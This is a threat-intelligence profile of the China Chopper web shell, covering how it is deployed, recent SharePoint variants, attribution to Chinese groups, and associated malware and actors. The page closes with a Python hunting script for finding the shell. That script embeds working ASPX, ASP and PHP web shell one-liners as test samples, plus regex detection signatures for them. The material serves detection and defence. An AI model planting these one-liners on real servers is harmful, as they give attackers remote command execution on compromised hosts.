China Chopper

Malware updated 23 days ago (2024-11-29T13:57:35.710Z)
China Chopper is a small, well-known web shell that has been used extensively by Chinese-speaking actors, including the BRONZE UNION group. It does not spread on its own and does not arrive through downloads or email: an attacker first obtains the ability to write files to a web server, typically by exploiting a vulnerability in an internet-facing application such as Microsoft Exchange or SharePoint, and then drops the server-side component, a script of a few hundred bytes that passes the contents of an HTTP request parameter straight to eval. A separate client application then drives that script over ordinary HTTP POST requests, giving the operator file management, command execution and database access on the compromised server. Because the server side is tiny and sits among legitimate ASPX, ASP, PHP or JSP pages, it is easy to overlook and often survives until the hosting application is rebuilt.

In June 2024, researchers at Kaspersky noticed recurring alerts in their telemetry for a new China Chopper variant on a public web server. The shell code was found inside several web shells on SharePoint servers, including stylecs.aspx, test.aspx and stylecss.aspx. Functionally the variant matched earlier versions, providing remote access and control over the compromised web servers. That detection prompted further investigation into related activity, including the Tropic Trooper campaign.

BRONZE UNION has been observed connecting to China Chopper web shells through a VPN, which keeps the operators' true source addresses out of the server's logs. Separately, Unit 42 researchers analysing the campaign they track as Diplomatic Specter noted that the activity generally paralleled Chinese office hours and employed tools typical of Chinese APT groups, including customized versions of Gh0st RAT, PlugX, Htran and China Chopper itself. The malware contained Mandarin-language code comments and debug strings, and multiple C2 servers were hosted with Chinese virtual service providers, including Cloudie Limited and Zenlayer. The shared use of PlugX and China Chopper points to Chinese operators, although direct government involvement remains unconfirmed.

Because new variants keep appearing, defenders should baseline the script files in their web-accessible directories and review any unexpected .aspx, .asp, .php or .jsp file, however small; a one-line file that evals request data is the classic China Chopper footprint.
Description last updated: 2024-11-28T11:44:06.970Z
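One concrete way to hunt for the server-side footprint described above, as an added example that is not part of this page or of any vendor's report: the script walks a web root, flags script files whose content hands a request parameter straight to eval (the publicly documented shape of the China Chopper server component and its close ASP and PHP relatives), and records whether the file is small enough to be a one-liner. The sample web root, the rule names, and the file names (borrowed from the SharePoint shells mentioned above, plus an ASP shell and a benign default.aspx) are constructed for the demo.

```python
"""Hunt for China Chopper-style one-liner web shells under a web root.

Added example, not code from this page or from any vendor report. It assumes
only the publicly documented shape of the China Chopper server component: a
tiny ASPX/ASP/PHP script that hands a request parameter straight to eval().
The sample web root built by build_sample_webroot() is constructed for the demo.
"""
import os
import re
import tempfile
from dataclasses import dataclass

# Ordered rules: specific one-liner signatures first, a broad "eval of
# request data" catch-all last. classify() reports the first rule that hits.
SHELL_RULES = [
    ("aspx-jscript-eval",        # <%eval(Request.Item["x"],"unsafe");%>
     re.compile(r'''\beval\s*\(\s*Request\s*(?:\.Item)?\s*\[\s*["'][^"']+["']\s*\]\s*,\s*["']unsafe["']''', re.I)),
    ("asp-vbscript-eval",        # <%eval request("x")%>
     re.compile(r'''\beval\b\s*\(?\s*request\s*\(\s*["'][^"']+["']\s*\)''', re.I)),
    ("php-request-eval",         # <?php @eval($_POST['x']);?>
     re.compile(r'''@?\beval\b\s*\(\s*\$_(?:POST|REQUEST|GET|COOKIE)\s*\[\s*["'][^"']+["']\s*\]\s*\)''', re.I)),
    ("generic-eval-of-request",  # anything else that evals Request data
     re.compile(r'''\beval\b\s*\([^)]*\brequest\b[^)]*\)''', re.I)),
]
WEB_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp"}
ONE_LINER_MAX_BYTES = 4096   # the documented server side is far smaller


@dataclass
class Finding:
    path: str
    rule: str
    size: int
    one_liner: bool


def classify(text):
    """Return the name of the first matching rule, or None for clean text."""
    for name, pattern in SHELL_RULES:
        if pattern.search(text):
            return name
    return None


def scan_file(path):
    """Classify one file. Only the first 256 KiB are read: a one-liner shell is
    complete within that window; a shell appended to the tail of a very large
    legitimate page is out of scope for this hunt."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(256 * 1024)
        size = os.path.getsize(path)
    except OSError:
        return None
    text = head.decode("utf-8", errors="replace")
    if "\x00" in text:   # Windows editors often save ASPX as UTF-16; re-decode
        text = head.decode("utf-16", errors="replace")
    rule = classify(text)
    if rule is None:
        return None
    return Finding(path, rule, size, size <= ONE_LINER_MAX_BYTES)


def scan_webroot(root):
    """Walk a web root and return findings sorted by path."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() in WEB_EXTENSIONS:
                finding = scan_file(os.path.join(dirpath, name))
                if finding is not None:
                    findings.append(finding)
    return sorted(findings, key=lambda f: f.path)


# Constructed sample web root: three shells (names borrowed from the SharePoint
# shells named on this page, plus an ASP one) and one benign page.
SAMPLES = {
    "layouts/stylecs.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "admin/login.asp": '<%eval request("cmd")%>',
    "uploads/test.php": "<?php @eval($_POST['password']);?>",
    "default.aspx": '<%@ Page Language="C#" %><html><body>Hello</body></html>',
}


def build_sample_webroot():
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def demo():
    """Scan the constructed web root; returns [(relative path, rule), ...]."""
    root = build_sample_webroot()
    results = []
    for f in scan_webroot(root):
        rel = os.path.relpath(f.path, root).replace(os.sep, "/")
        print(f"{f.rule:24} {f.size:5d} B  one-liner={f.one_liner}  {rel}")
        results.append((rel, f.rule))
    return results


if __name__ == "__main__":
    demo()
```

Run it as-is to see the three constructed shells flagged and the benign page ignored, or point scan_webroot() at a real IIS or PHP document root. The rules are deliberately narrow signatures rather than a general obfuscation detector: a shell that base64-decodes or string-splits its eval call will not match, so treat a clean result as "no classic one-liner found", not as "no web shell", and pair it with a file-inventory baseline of the web root.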
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
Alias: BlackMould (2 votes)
BlackMould is a possible alias for China Chopper. BlackMould is a native web shell observed in use by GALLIUM, a China-aligned intrusion group. Like China Chopper, it is placed on web servers the group has already compromised to give the operators remote command execution, rather than arriving through downloads or email.
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Web Shell
Windows
Apt
Malware
Exploit
Webshell
Vpn
Payload
Microsoft
China
Chinese
Exploits
Iis
Regeorg
Remote Code ...
Vulnerability
Associated Malware
Malware: PingPull (association type: unspecified; 3 votes)
The PingPull malware is associated with China Chopper. PingPull is a remote access trojan developed by the Chinese nation-state group known as Alloy Taurus, also referred to as Gallium. It gives the operators command execution and file access on compromised hosts and is used for espionage rather than for data theft for ransom.
Malware: ASPXSpy (association type: unspecified; 3 votes)
The ASPXSpy malware is associated with China Chopper. ASPXSpy is a web shell that has been used by various threat actors to control compromised web servers. A reported 2022 campaign deployed it to multiple hosted websites. It's typically installed on vulnerable
Malware: PlugX (association type: unspecified; 2 votes)
The PlugX malware is associated with China Chopper. PlugX is a Remote Access Trojan (RAT) known for its stealthy, long-running operations. Threat actors use it to control compromised systems, move laterally and steal data; it is an espionage tool rather than ransomware. Its deployment has been linked to s
Associated Threat Actors
Threat actor: HAFNIUM (association type: unspecified; 2 votes)
The HAFNIUM threat actor is associated with China Chopper. HAFNIUM, also known as Silk Typhoon, is a threat actor group originating from China that has been involved in several significant cyber-attacks. They have exploited vulnerabilities in Microsoft Exchange Server software and Zoho products, using methods such as web shells for remote access and unconve
Threat actor: Flax Typhoon (association type: unspecified; 2 votes)
The Flax Typhoon threat actor is associated with China Chopper. Flax Typhoon is a threat actor reportedly linked to China that has been actively targeting Taiwan, as well as other regions globally. This group, also known by aliases such as RedJuliett and Ethereal Panda, has been implicated in cyberespionage activities against critical infrastructure entities, go
Threat actor: GALLIUM (association type: unspecified; 2 votes)
The GALLIUM threat actor is associated with China Chopper. Gallium, also known as Alloy Taurus, is a threat actor group that has been associated with significant cyber-espionage campaigns and is believed to have ties with China. The group has been linked to multiple intrusion sets targeting network devices, including routers and servers. Gallium notably tar
Source Document References
Information about the China Chopper malware was read from the documents corpus below. This display is limited to 20 results.
Source (created)
Securelist (21 days ago)
Securelist (24 days ago)
DARKReading (4 months ago)
Securelist (4 months ago)
BankInfoSecurity (7 months ago)
DARKReading (7 months ago)
Checkpoint (8 months ago)
DARKReading (8 months ago)
CERT-EU (a year ago)
CERT-EU (a year ago)
MITRE (a year ago)
CERT-EU (a year ago)
CERT-EU (a year ago)
CERT-EU (a year ago)
CERT-EU (a year ago)
Securityaffairs (a year ago)
Unit42 (a year ago)
Unit42 (a year ago)
CERT-EU (a year ago)
CERT-EU (a year ago)